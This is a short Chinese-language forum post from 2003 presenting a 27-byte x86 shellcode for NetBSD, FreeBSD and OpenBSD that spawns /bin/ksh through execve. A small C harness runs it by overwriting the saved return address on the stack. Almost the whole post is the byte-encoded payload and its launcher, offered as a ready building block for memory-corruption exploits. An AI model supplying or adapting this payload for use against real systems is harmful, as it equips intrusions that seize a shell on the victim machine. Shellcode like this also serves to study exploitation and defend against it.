BSD Unix Shellcode

在看过一位大侠写的shellcode之后，终于写出了一个可以在NetBSD、FreeBSD和OpenBSD上运行的shellcode，在这里特别感谢董剑(tongjian@stuff.sina.com)和scz(scz@nsfocus.com)的帮助。

/*
 * BSD shellcode for NetBSD, FreeBSD, OpenBSD
 * execve /bin/ksh
 * by matthew
 * Apr 11 2003
 *
 * 27 bytes.
 *
 *    __@
 *  _ \<_
 * (_)/(_) matthew@arbornet.org
 *
 */

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x2f\x6b\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x50"
"\x51"
"\x53"
"\x50"
"\xb0"
"\x3b"
"\xcd\x80";

int
main()
{
    int iret;
    
    printf("BSD shellcode: execve /bin/ksh\n");
    printf("Author:  matthew (matthew@arbornet.org)\n");
    printf("Length: %d\n", strlen(shellcode));

    (* ((int *)&iret + 2)) = (int)shellcode;
}